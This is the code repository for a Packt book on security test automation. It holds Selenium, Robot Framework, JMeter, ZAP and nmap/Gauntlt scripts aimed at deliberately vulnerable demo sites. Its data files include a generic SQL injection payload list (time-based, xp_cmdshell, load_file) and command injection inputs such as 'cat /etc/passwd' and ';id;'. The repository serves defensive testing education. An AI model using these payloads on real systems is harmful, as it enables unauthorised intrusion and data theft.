├── Chapter08 ├── readme └── nmap.attack ├── Chapter09 ├── readme └── ZAP RequestsSample.robot ├── Chapter11 ├── readme ├── cmdi.csv ├── Selenium Proxy Sample.py ├── NodeGoat_SignIn_SB.py ├── NodeGoat_SignIn.py ├── NodeGoat.jmx └── ZAP_Report.html ├── Chapter12 ├── readme ├── RF_DDT.robot └── SignIn_DDT_NodeGoat.py ├── Chapter13 ├── readme ├── nmap_NodeGoat.robot └── nmap_NodeGoat_gauntlt.attack ├── Chapter06 ├── readme ├── Auto_ZAP_UserRegistration.BAT ├── userregistration_SB.py ├── AutoZAP.BAT └── UserRegistration.py ├── Chapter05 ├── readme ├── sqli.csv ├── Generic-SQLi.txt.txt └── MyRequest.jmx ├── LICENSE └── README.md /Chapter08/readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Chapter09/readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Chapter11/readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Chapter12/readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Chapter13/readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Chapter06/readme: -------------------------------------------------------------------------------- 1 | 2 | AutoZAP.BAT 3 | -------------------------------------------------------------------------------- /Chapter05/readme: -------------------------------------------------------------------------------- 1 | 2 | MyRequest.jmx 3 | -------------------------------------------------------------------------------- /Chapter05/sqli.csv: -------------------------------------------------------------------------------- 1 | username,password 2 | a,a 3 | )%20or%20('x'='x,'' 4 | %20or%201=1,' 1=1 5 | -------------------------------------------------------------------------------- /Chapter11/cmdi.csv: -------------------------------------------------------------------------------- 1 | pwd 2 | last 3 | cat /etc/passwd 4 | ls -la /tmp 5 | ver 6 | chdir 7 | +|+Dir+c:\ 8 | $+|+Dir+c:\ 9 | ;id; 10 | ;id 11 | ;netstat -a; 12 | ;id; 13 | |id -------------------------------------------------------------------------------- /Chapter13/nmap_NodeGoat.robot: -------------------------------------------------------------------------------- 1 | *** Settings *** 2 | Library Process 3 | 4 | *** Test Cases *** 5 | Testing if the website was previously reported XSS 6 | ${result} = Run Process nmap -p80 --script http-xssed nodegoat.kerokuapp.com 7 | Log ${result.stdout} 8 | Should Contain ${result.stdout} No previously reported -------------------------------------------------------------------------------- /Chapter06/Auto_ZAP_UserRegistration.BAT: -------------------------------------------------------------------------------- 1 | ZAP -port 8090 2 | 3 | pytest UserRegistration.py --browser=chrome --proxy=127.0.0.1:8090 4 | 5 | timeout /T 30 6 | 7 | CURL "http://localhost:8090/JSON/ascan/action/scan/?zapapiformat=JSON&formMethod=GET&url=http://hackazon.webscantest.com&recurse=&inScopeOnly=&scanPolicyName=&method=&postData=&contextId=" 8 | 9 | timeout /T 30 10 | 11 | Curl “http://localhost:8090/HTML/core/view/alerts” > UserRegisterResult.html -------------------------------------------------------------------------------- /Chapter11/Selenium Proxy Sample.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | 3 | # Replace the 'self.driver = webdriver.Firefox()' with the following 4 | profile = webdriver.FirefoxProfile() 5 | profile.set_preference('network.proxy_type',1) 6 | profile.set_preference('network.proxy.http',"127.0.0.1") 7 | profile.set_preference('network.proxy.http_port',"8090") 8 | driver=webdriver.Firefox(profile) 9 | # End of Replacement 10 | 11 | 12 | driver.get('http://nodegoat.herokuapp.com/login') 13 | driver.close() 14 | -------------------------------------------------------------------------------- /Chapter08/nmap.attack: -------------------------------------------------------------------------------- 1 | Feature: nmap attacks for scanme.nmap.org 2 | Background: It's used to check ScanMe website port listening status 22, 25, 80, 443 3 | 4 | Given "nmap" is installed 5 | And the following profile: 6 | | name | value | 7 | | hostname | scanme.nmap.org | 8 | | host | scanme.nmap.org | 9 | | tcp_ping_ports | 22,25,80,443 | 10 | 11 | Scenario: Verify server is open on the expected set of ports using the nmap-fast attack step 12 | When I launch a "nmap-fast" attack 13 | Then the output should match /80.tcp\s+open/ -------------------------------------------------------------------------------- /Chapter12/RF_DDT.robot: -------------------------------------------------------------------------------- 1 | *** Settings *** 2 | Library Collections 3 | Library CSVLibrary 4 | Library SeleniumLibrary 5 | Library OperatingSystem 6 | Library String 7 | Library Collections 8 | 9 | *** Test Cases *** 10 | SignIn_DDT 11 | Open Browser http://nodegoat.herokuapp.com/login 12 | @{data}= read csv file to list sqli.csv 13 | Log ${data} 14 | :FOR ${x} IN @{data} 15 | \ Log ${x} 16 | \ Input Text id=userName ${x[${0}]} 17 | \ Input Text id=password ${x[${1}]} 18 | \ Click Button xpath=//button[@type='submit'] 19 | \ Log ${x[${0}]} 20 | \ Log ${x[${1}]} 21 | Close Browser 22 | -------------------------------------------------------------------------------- /Chapter11/NodeGoat_SignIn_SB.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from seleniumbase import BaseCase 3 | 4 | 5 | class SignIn(BaseCase): 6 | 7 | def test_sign_in(self): 8 | self.open('http://nodegoat.herokuapp.com/login') 9 | self.update_text('#userName', 'user1') 10 | self.update_text('#password', 'User1_123') 11 | self.click("//button[@type='submit']") 12 | self.open('http://nodegoat.herokuapp.com/contributions') 13 | self.click("//button[@type='submit']") 14 | self.open('http://nodegoat.herokuapp.com/contributions') 15 | self.open('http://nodegoat.herokuapp.com/allocations/2') 16 | self.open('http://nodegoat.herokuapp.com/memos') 17 | self.open('http://nodegoat.herokuapp.com/profile') 18 | -------------------------------------------------------------------------------- /Chapter06/userregistration_SB.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from seleniumbase import BaseCase 3 | class UserRegistration(BaseCase): 4 | 5 | def test_user_registration(self): 6 | self.open('http://hackazon.webscantest.com/') 7 | self.click("link=Sign In / Sign Up") 8 | self.click('#username') 9 | self.click("link=New user?") 10 | self.click('#first_name') 11 | self.update_text('#first_name', 'myFirstName') 12 | self.update_text('#last_name', 'myLastName') 13 | self.update_text('#username', 'myUserName1') 14 | self.update_text('#email', 'abc@a.com') 15 | self.update_text('#password', 'pass1234') 16 | self.update_text('#password_confirmation', 'pass1234') 17 | self.click("//input[@value='Register']") 18 | 19 | -------------------------------------------------------------------------------- /Chapter09/ZAP RequestsSample.robot: -------------------------------------------------------------------------------- 1 | *** Settings *** 2 | Suite Teardown Delete All Sessions 3 | Library Collections 4 | Library String 5 | Library RequestsLibrary 6 | Library OperatingSystem 7 | 8 | *** Variables *** 9 | ${url} http://demo.testfire.net 10 | ${SpiderScan} http://localhost:8090/JSON/spider/action/scan/?zapapiformat=JSON&formMethod=GET&url=${url}&maxChildren=&recurse=&contextName=&subtreeOnly= 11 | 12 | *** Test Cases *** 13 | ZAP Spider Scan 14 | [Tags] get skip 15 | Create Session ZAP ${SpiderScan} 16 | ${resp}= Get Request ZAP / 17 | Should Be Equal As Strings ${resp.status_code} 200 18 | Create Session ZAP http://localhost:8090/HTML/core/view/alertsSummary/?zapapiformat=HTML&formMethod=GET&baseurl= 19 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Packt 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Chapter06/AutoZAP.BAT: -------------------------------------------------------------------------------- 1 | echo start the ZAP in daemon mode 2 | 3 | ZAP.exe -daemon 4 | 5 | 6 | 7 | echo the status of ZAP 8 | 9 | CURL http://localhsot:8090 10 | 11 | 12 | 13 | echo spider scan for the web site 14 | 15 | CURL "http://localhost:8090/JSON/spider/action/scan/?zapapiformat=JSON&formMethod=GET&url=http://hackazon.webscantest.com" 16 | 17 | 18 | 19 | echo Active Scan for the website 20 | 21 | CURL "http://localhost:8090/JSON/ascan/action/scan/?zapapiformat=JSON&formMethod=GET&url=http://hackazon.webscantest.com&recurse=&inScopeOnly=&scanPolicyName=&method=&postData=&contextId=" 22 | 23 | 24 | 25 | echo Wait for 20 sec to complete the ActiveScan before generating the testing report 26 | 27 | echo The timeout is for Windows command. For running in Linux, please change it to sleep. 28 | 29 | timeout 20 30 | 31 | 32 | 33 | echo List the security assessments results (alerts), and output the report to ZAP_Report.HTML 34 | 35 | CURL "http://localhost:8090/JSON/ascan/view/status/" 36 | 37 | CURL "http://localhost:8090/HTML/core/view/alerts/" 38 | 39 | CURL "http://127.0.0.1:8090/OTHER/core/other/htmlreport/?formMethod=GET" > ZAP_Report.HTML 40 | 41 | 42 | 43 | echo shutdown the ZAP 44 | 45 | CURL “http://localhost:8090/JSON/core/action/shutdown/?zapapiformat=JSON&formMethod=GET” -------------------------------------------------------------------------------- /Chapter11/NodeGoat_SignIn.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from selenium import webdriver 3 | from selenium.webdriver.common.by import By 4 | from selenium.webdriver.common.keys import Keys 5 | from selenium.webdriver.support.ui import Select 6 | from selenium.common.exceptions import NoSuchElementException 7 | from selenium.common.exceptions import NoAlertPresentException 8 | import unittest, time, re 9 | 10 | class SignIn(unittest.TestCase): 11 | def setUp(self): 12 | self.driver = webdriver.Firefox() 13 | self.driver.implicitly_wait(30) 14 | 15 | def test_sign_in(self): 16 | driver = self.driver 17 | driver.get("http://nodegoat.herokuapp.com/login") 18 | driver.find_element_by_id("userName").clear() 19 | driver.find_element_by_id("userName").send_keys("user1") 20 | driver.find_element_by_id("password").clear() 21 | driver.find_element_by_id("password").send_keys("User1_123") 22 | driver.find_element_by_xpath("//button[@type='submit']").click() 23 | driver.get("http://nodegoat.herokuapp.com/contributions") 24 | driver.find_element_by_xpath("//button[@type='submit']").click() 25 | driver.get("http://nodegoat.herokuapp.com/contributions") 26 | driver.get("http://nodegoat.herokuapp.com/allocations/2") 27 | driver.get("http://nodegoat.herokuapp.com/memos") 28 | driver.get("http://nodegoat.herokuapp.com/profile") 29 | 30 | 31 | def tearDown(self): 32 | self.driver.quit() 33 | 34 | 35 | if __name__ == "__main__": 36 | unittest.main() -------------------------------------------------------------------------------- /Chapter12/SignIn_DDT_NodeGoat.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from selenium import webdriver 3 | from selenium.webdriver.common.by import By 4 | from selenium.webdriver.common.keys import Keys 5 | from selenium.webdriver.support.ui import Select 6 | from selenium.common.exceptions import NoSuchElementException 7 | from selenium.common.exceptions import NoAlertPresentException 8 | from ddt import ddt, data, unpack 9 | import csv 10 | import unittest, time, re 11 | 12 | @ddt 13 | class NodeGoatSignIn(unittest.TestCase): 14 | # 15 | def get_csv_data(csv_path): 16 | rows = [] 17 | csv_data = open(str(csv_path), "rb") 18 | content = csv.reader(csv_data) 19 | next(content, None) 20 | for row in content: 21 | rows.append(row) 22 | return rows 23 | 24 | @classmethod 25 | def setUp(self): 26 | self.driver = webdriver.Firefox() 27 | self.driver.implicitly_wait(30) 28 | 29 | 30 | # The @data and @unpack will help to read all the data in the 'sqli.csv' for the testing loop of the test_sign_in method 31 | @data(*get_csv_data("sqli.csv")) 32 | @unpack 33 | def test_sign_in(self, username, password): 34 | driver = self.driver 35 | 36 | driver.get("http://nodegoat.herokuapp.com/login") 37 | driver.find_element_by_id("userName").click() 38 | driver.find_element_by_id("userName").clear() 39 | driver.find_element_by_id("userName").send_keys(username) 40 | driver.find_element_by_id("password").click() 41 | driver.find_element_by_id("password").clear() 42 | driver.find_element_by_id("password").send_keys(password) 43 | driver.find_element_by_xpath("//button[@type='submit']").click() 44 | 45 | @classmethod 46 | def tearDown(self): 47 | self.driver.quit() 48 | 49 | 50 | 51 | 52 | if __name__ == "__main__": 53 | unittest.main() 54 | 55 | -------------------------------------------------------------------------------- /Chapter05/Generic-SQLi.txt.txt: -------------------------------------------------------------------------------- 1 | ; 2 | ' 3 | ; execute immediate 'sel' || 'ect us' || 'er' 4 | update 5 | or 0=0 # 6 | "a"" or 3=3 --" 7 | or 'a' = 'a 8 | or 1=1 9 | username 10 | )%20or%20('x'='x 11 | %20or%201=1 12 | ; execute immediate 'sel' || 'ect us' || 'er' 13 | benchmark(10000000,MD5(1))# 14 | update 15 | ";waitfor delay '0:0:__TIME__'-- 16 | 1) or pg_sleep(__TIME__)-- 17 | ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 18 | "hi"") or (""a""=""a" 19 | delete 20 | like 21 | " or sleep(__TIME__)# 22 | pg_sleep(__TIME__)-- 23 | *(|(objectclass=*)) 24 | declare @q nvarchar (200) 0x730065006c00650063 ... 25 | or 0=0 # 26 | insert 27 | 1) or sleep(__TIME__)# 28 | ) or ('a'='a 29 | ; exec xp_regread 30 | *| 31 | @var select @var as var into temp end -- 32 | 1)) or benchmark(10000000,MD5(1))# 33 | asc 34 | (||6) 35 | "a"" or 3=3--" 36 | " or benchmark(10000000,MD5(1))# 37 | # from wapiti 38 | or 0=0 -- 39 | 1 waitfor delay '0:0:10'-- 40 | or 'a'='a 41 | hi or 1=1 --" 42 | or a = a 43 | UNION ALL SELECT 44 | ) or sleep(__TIME__)=' 45 | )) or benchmark(10000000,MD5(1))# 46 | hi' or 'a'='a 47 | 0 48 | 21 % 49 | limit 50 | or 1=1 51 | or 2 > 1 52 | ")) or benchmark(10000000,MD5(1))# 53 | PRINT 54 | hi') or ('a'='a 55 | or 3=3 56 | ));waitfor delay '0:0:__TIME__'-- 57 | a' waitfor delay '0:0:10'-- 58 | 1;(load_file(char(47,101,116,99,47,112,97,115, ... 59 | or%201=1 60 | 1 or sleep(__TIME__)# 61 | or 1=1 62 | and 1 in (select var from temp)-- 63 | or '7659'='7659 64 | or 'text' = n'text' 65 | -- 66 | or 1=1 or ''=' 67 | declare @s varchar (200) select @s = 0x73656c6 ... 68 | exec xp 69 | ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 70 | 3.10E+17 71 | " or pg_sleep(__TIME__)-- 72 | x' AND email IS NULL; -- 73 | & 74 | admin' or ' 75 | or 'unusual' = 'unusual' 76 | // 77 | truncate 78 | 1) or benchmark(10000000,MD5(1))# 79 | \x27UNION SELECT 80 | declare @s varchar(200) select @s = 0x77616974 ... 81 | tz_offset 82 | sqlvuln 83 | "));waitfor delay '0:0:__TIME__'-- 84 | ||6 85 | or%201=1 -- 86 | %2A%28%7C%28objectclass%3D%2A%29%29 87 | or a=a -------------------------------------------------------------------------------- /Chapter13/nmap_NodeGoat_gauntlt.attack: -------------------------------------------------------------------------------- 1 | @slow 2 | 3 | Feature: nmap attacks for website. It will cover the following tesitng security header check, HTTP Slow DOS check, SSL cipher check, XSSed History Check, SQL Injection and the Stored XSS. 4 | 5 | Background: 6 | Given "nmap" is installed 7 | And the following profile: 8 | | name | value | 9 | | host | nodegoat.kerokuapp.com | 10 | 11 | 12 | Scenario: Verify the security header using the http-security-headers 13 | When I launch a "nmap" attack with: 14 | """ 15 | nmap -p80 --script http-security-headers 16 | """ 17 | Then the output should contain "X-Frame-Options: DENY" 18 | 19 | 20 | Scenario: Verify if the server is vulnerable to HTTP SLOW DOS attack 21 | When I launch an "nmap" attack with: 22 | """ 23 | nmap -p80,443 --script http-slowloris-check 24 | """ 25 | Then the output should not contain: 26 | """ 27 | LIKELY VULNERABLE 28 | """ 29 | 30 | Scenario: Verify the uses of SSL 31 | When I launch an "nmap" attack with: 32 | """ 33 | nmap --script=ssl-enum-ciphers 34 | """ 35 | Then the output should not contain: 36 | """ 37 | SSL 38 | """ 39 | 40 | Scenario: Was there any reported XSS history of the website? 41 | When I launch an "nmap" attack with: 42 | """ 43 | nmap -p80 --script http-xssed.nse 44 | """ 45 | Then the output should not contain: 46 | """ 47 | xssed.com found the following previsouly reported XSS vulnerabilities marked as unfixed 48 | """ 49 | 50 | Scenario: Verify any potential SQL injection of the website. 51 | When I launch an "nmap" attack with: 52 | """ 53 | nmap -sV --script=http-sql-injection 54 | """ 55 | Then the output should not contain: 56 | """ 57 | Possible sqli for 58 | """ 59 | 60 | Scenario: Verify any potential Stored XSS 61 | When I launch an "nmap" attack with: 62 | """ 63 | nmap -p80 --script http-stored-xss.nse 64 | """ 65 | Then the output should contain: 66 | """ 67 | Couldn't find any stored XSS vulnerabilities. 68 | """ 69 | 70 | -------------------------------------------------------------------------------- /Chapter06/UserRegistration.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from selenium import webdriver 3 | from selenium.webdriver.common.by import By 4 | from selenium.webdriver.common.keys import Keys 5 | from selenium.webdriver.support.ui import Select 6 | from selenium.common.exceptions import NoSuchElementException 7 | from selenium.common.exceptions import NoAlertPresentException 8 | import unittest, time, re 9 | 10 | class UserRegistration(unittest.TestCase): 11 | def setUp(self): 12 | self.driver = webdriver.Firefox() 13 | self.driver.implicitly_wait(30) 14 | self.verificationErrors = [] 15 | self.accept_next_alert = True 16 | 17 | def test_user_registration(self): 18 | driver = self.driver 19 | driver.get("http://hackazon.webscantest.com/") 20 | driver.find_element_by_link_text("Sign In / Sign Up").click() 21 | driver.find_element_by_id("username").click() 22 | driver.find_element_by_link_text("New user?").click() 23 | driver.find_element_by_id("first_name").click() 24 | driver.find_element_by_id("first_name").clear() 25 | driver.find_element_by_id("first_name").send_keys("FirstName") 26 | driver.find_element_by_id("last_name").clear() 27 | driver.find_element_by_id("last_name").send_keys("LastName") 28 | driver.find_element_by_id("username").clear() 29 | driver.find_element_by_id("username").send_keys("UserName1") 30 | driver.find_element_by_id("email").clear() 31 | driver.find_element_by_id("email").send_keys("abc@a.com") 32 | driver.find_element_by_id("password").clear() 33 | driver.find_element_by_id("password").send_keys("pass1234") 34 | driver.find_element_by_id("password_confirmation").clear() 35 | driver.find_element_by_id("password_confirmation").send_keys("pass1234") 36 | driver.find_element_by_xpath("//input[@value='Register']").click() 37 | 38 | def is_element_present(self, how, what): 39 | try: self.driver.find_element(by=how, value=what) 40 | except NoSuchElementException as e: return False 41 | return True 42 | 43 | def is_alert_present(self): 44 | try: self.driver.switch_to_alert() 45 | except NoAlertPresentException as e: return False 46 | return True 47 | 48 | def close_alert_and_get_its_text(self): 49 | try: 50 | alert = self.driver.switch_to_alert() 51 | alert_text = alert.text 52 | if self.accept_next_alert: 53 | alert.accept() 54 | else: 55 | alert.dismiss() 56 | return alert_text 57 | finally: self.accept_next_alert = True 58 | 59 | def tearDown(self): 60 | self.driver.quit() 61 | self.assertEqual([], self.verificationErrors) 62 | 63 | if __name__ == "__main__": 64 | unittest.main() 65 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | # Practical Security Automation and Testing 5 | 6 | Practical Security Automation and Testing 7 | 8 | This is the code repository for [Practical Security Automation and Testing](https://www.packtpub.com/networking-and-servers/practical-security-automation-and-testing?utm_source=github&utm_medium=repository&utm_campaign=9781789802023), published by Packt. 9 | 10 | **Tools and techniques for automated security scanning and testing in DevSecOps** 11 | 12 | ## What is this book about? 13 | Security automation is the automatic handling of software security assessments tasks. This book helps you to build your security automation framework to scan for vulnerabilities without human intervention. 14 | 15 | This book covers the following exciting features: 16 | * Automate secure code inspection with open source tools and effective secure code scanning suggestions 17 | * Apply security testing tools and automation frameworks to identify security vulnerabilities in web, mobile and cloud services 18 | * Integrate security testing tools such as OWASP ZAP, NMAP, SSLyze, SQLMap, and OpenSCAP 19 | * Implement automation testing techniques with Selenium, JMeter, Robot Framework, Gauntlt, BDD, DDT, and Python unittest 20 | * Execute security testing of a Rest API Implement web application security with open source tools and script templates for CI/CD integration 21 | 22 | If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1789802024) today! 23 | 24 | https://www.packtpub.com/ 26 | 27 | 28 | ## Instructions and Navigations 29 | All of the code is organized into folders. For example, Chapter02. 30 | 31 | The code will look like the following: 32 | ``` 33 | saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 34 | saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false); 35 | saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 36 | ``` 37 | 38 | **Following is what you need for this book:** 39 | The book is for software developers, architects, testers and QA engineers who are looking to leverage automated security testing techniques. 40 | 41 | With the following software and hardware list you can run all code files present in the book (Chapter 1-15). 42 | 43 | ### Software and Hardware List 44 | 45 | | Chapter | Software required | OS required | 46 | | -------- | ------------------------------------| -----------------------------------| 47 | | 1-15 | Virtual machine | Windows, Mac OS X, and Linux (Any) | 48 | | 1-15 | ZAP | Windows, Mac OS X, and Linux (Any) | 49 | 50 | 51 | We also provide a PDF file that has color images of the screenshots/diagrams used in this book. [Click here to download it](https://www.packtpub.com/sites/default/files/downloads/9781789802023_ColorImages.pdf). 52 | 53 | ### Related products 54 | * Cloud Security Automation [[Packt]](https://www.packtpub.com/networking-and-servers/cloud-security-automation?utm_source=github&utm_medium=repository&utm_campaign=9781788627863) [[Amazon]](https://www.amazon.com/dp/1788627865) 55 | 56 | * Security Automation with Ansible 2 [[Packt]](https://www.packtpub.com/virtualization-and-cloud/security-automation-ansible-2?utm_source=github&utm_medium=repository&utm_campaign=9781788394512) [[Amazon]](https://www.amazon.com/dp/1788394518) 57 | 58 | ## Get to Know the Author 59 | **Tony Hsiang-Chih Hsu** 60 | is a senior security architect, software development manager, and project manager with more than 20 years' experience in security services technology. He has extensive experience of the Secure Software Development Lifecycle (SSDLC) in relation to activities including secure architecture/design review, secure code review, threat modeling, automated security testing, and cloud service inspection. He is also an in-house SDL trainer, having offered hands-on courses totaling in more than 300 hours. He is also the author of Hands-on Security in DevOps, and a co-author of several Open Web Application Security Project (OWASP) projects, including the OWASP testing guide, a proactive control guide, deserialization, cryptographic, and the XXE prevention cheatsheet. 61 | 62 | 63 | 64 | ## Other books by the author 65 | * [Hands-On Security in DevOps](https://www.packtpub.com/networking-and-servers/hands-security-devops?utm_source=github&utm_medium=repository&utm_campaign=9781788995504) 66 | 67 | ### Suggestions and Feedback 68 | [Click here](https://docs.google.com/forms/d/e/1FAIpQLSdy7dATC6QmEL81FIUuymZ0Wy9vH1jHkvpY57OiMeKGqib_Ow/viewform) if you have any feedback or suggestions. 69 | ### Download a free PDF 70 | 71 | If you have already purchased a print or Kindle version of this book, you can get a DRM-free PDF version at no cost.
Simply click on the link to claim your free PDF. 72 |

https://packt.link/free-ebook/9781789802023

-------------------------------------------------------------------------------- /Chapter05/MyRequest.jmx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | false 7 | true 8 | false 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | continue 17 | 18 | false 19 | 30 20 | 21 | 1 22 | 1 23 | false 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | false 33 | user 34 | = 35 | true 36 | uid 37 | 38 | 39 | false 40 | ${password} 41 | = 42 | true 43 | passw 44 | 45 | 46 | false 47 | Login 48 | = 49 | true 50 | btnSubmit 51 | 52 | 53 | 54 | demo.testfire.net 55 | 80 56 | http 57 | 58 | /bank/login.aspx 59 | POST 60 | true 61 | false 62 | true 63 | false 64 | 65 | 127.0.0.1 66 | 8090 67 | 68 | 69 | 70 | 71 | 72 | 73 | , 74 | 75 | sqli.csv 76 | false 77 | false 78 | true 79 | shareMode.group 80 | false 81 | password 82 | 83 | 84 | 85 | false 86 | 87 | saveConfig 88 | 89 | 90 | true 91 | true 92 | true 93 | 94 | true 95 | true 96 | true 97 | true 98 | false 99 | true 100 | true 101 | false 102 | false 103 | false 104 | true 105 | false 106 | false 107 | false 108 | true 109 | 0 110 | true 111 | true 112 | true 113 | true 114 | true 115 | true 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /Chapter11/NodeGoat.jmx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | false 7 | true 8 | false 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | continue 17 | 18 | false 19 | 1 20 | 21 | 1 22 | 1 23 | false 24 | 25 | 26 | 27 | 28 | 29 | 30 | false 31 | 32 | 33 | 34 | 35 | 36 | Referer 37 | http://nodegoat.herokuapp.com/dashboard 38 | 39 | 40 | User-Agent 41 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 42 | 43 | 44 | Accept 45 | text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 46 | 47 | 48 | Accept-Encoding 49 | gzip, deflate 50 | 51 | 52 | Cache-Control 53 | max-age=0 54 | 55 | 56 | Upgrade-Insecure-Requests 57 | 1 58 | 59 | 60 | 61 | 62 | 63 | false 64 | 65 | saveConfig 66 | 67 | 68 | true 69 | true 70 | true 71 | 72 | true 73 | true 74 | true 75 | true 76 | false 77 | true 78 | true 79 | false 80 | false 81 | false 82 | true 83 | false 84 | false 85 | false 86 | true 87 | 0 88 | true 89 | true 90 | true 91 | true 92 | true 93 | true 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | false 104 | user1 105 | = 106 | true 107 | userName 108 | 109 | 110 | false 111 | User1_123 112 | = 113 | true 114 | password 115 | 116 | 117 | false 118 | 119 | = 120 | true 121 | _csrf 122 | 123 | 124 | 125 | nodegoat.herokuapp.com 126 | 127 | http 128 | 129 | /login 130 | POST 131 | true 132 | false 133 | true 134 | false 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | Employee Retirement Savings Management 143 | 144 | 145 | Assertion.response_data 146 | false 147 | 2 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | nodegoat.herokuapp.com 156 | 157 | 158 | 159 | /contributions 160 | GET 161 | true 162 | false 163 | true 164 | false 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | Employee Pre-Tax 173 | 174 | 175 | Assertion.response_data 176 | false 177 | 16 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | nodegoat.herokuapp.com 186 | 187 | 188 | 189 | /allocations/2 190 | GET 191 | true 192 | false 193 | true 194 | false 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | Stock Performance 203 | 204 | 205 | Assertion.response_data 206 | false 207 | 16 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | nodegoat.herokuapp.com 216 | 217 | 218 | 219 | /memos 220 | GET 221 | true 222 | false 223 | true 224 | false 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | Send a memo 233 | 234 | 235 | Assertion.response_data 236 | false 237 | 16 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | nodegoat.herokuapp.com 246 | 247 | 248 | 249 | /profile 250 | GET 251 | true 252 | false 253 | true 254 | false 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | My Profile 263 | 264 | 265 | Assertion.response_data 266 | false 267 | 16 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | false 276 | a 277 | = 278 | true 279 | firstName 280 | 281 | 282 | false 283 | b 284 | = 285 | true 286 | lastName 287 | 288 | 289 | false 290 | 123 291 | = 292 | true 293 | ssn 294 | 295 | 296 | false 297 | 1234-02-01 298 | = 299 | true 300 | dob 301 | 302 | 303 | false 304 | 123123 305 | = 306 | true 307 | bankAcc 308 | 309 | 310 | false 311 | 0198212# 312 | = 313 | true 314 | bankRouting 315 | 316 | 317 | false 318 | add 319 | = 320 | true 321 | address 322 | 323 | 324 | false 325 | 326 | = 327 | true 328 | _csrf 329 | 330 | 331 | 332 | nodegoat.herokuapp.com 333 | 334 | 335 | 336 | /profile 337 | POST 338 | true 339 | false 340 | true 341 | false 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | Profile updated successfully. 350 | 351 | 352 | Assertion.response_data 353 | false 354 | 16 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | nodegoat.herokuapp.com 363 | 364 | 365 | 366 | /logout 367 | GET 368 | true 369 | false 370 | true 371 | false 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | New user? 380 | 381 | 382 | Assertion.response_data 383 | false 384 | 16 385 | 386 | 387 | 388 | 389 | 390 | 391 | 392 | -------------------------------------------------------------------------------- /Chapter11/ZAP_Report.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ZAP Scanning Report 5 | 64 | 65 | 66 |

67 | 68 | ZAP Scanning Report 69 |

70 |

71 | 72 |

73 |

Summary of Alerts

74 | 75 | 76 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 |
Risk 77 | LevelNumber 78 | of Alerts
High3
Medium2
Low6
Informational0
93 |
94 |

Alert Detail

95 |
